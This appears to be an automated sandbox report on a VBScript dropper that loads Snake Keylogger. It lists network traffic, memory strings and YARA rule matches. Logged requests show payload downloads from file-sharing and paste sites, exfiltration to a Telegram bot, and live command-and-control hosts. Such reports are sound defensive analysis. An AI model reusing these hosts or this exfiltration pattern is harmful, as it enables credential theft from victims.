                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49713 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1Host: 3005.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /d/QXyRXYmm/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:088753%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:06:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20088753%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: 3005.filemail.com
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: global trafficDNS traffic detected: DNS query: paste.ee
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: turkey.ipchina163.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 07:22:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAD41000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://turkey.ipchina163.com
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAD41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:088753%0D%0ADate%20a
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.000000000336A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enh
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                  Source: jjmax il.vbsString found in binary or memory: https://github.com/koswald/VBScript
                  Source: wscript.exe, 00000000.00000003.1262818656.000002480F411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261915374.000002480D3D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1259928174.000002480EE11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1259471357.000002480EE3E000.00000004.00000020.00020000.00000000.sdmp, jjmax il.vbsString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                  Source: wscript.exe, 00000000.00000003.1262408779.000002480F311000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262545228.000002480F36B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262818656.000002480F411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261915374.000002480D3D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1259471357.000002480EE3E000.00000004.00000020.00020000.00000000.sdmp, jjmax il.vbsString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CC9C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CC9C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/QX
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CC9C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/QXyRXYmm/0
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003231000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.000000000325C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.000000000339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.000000000339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownHTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49803 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
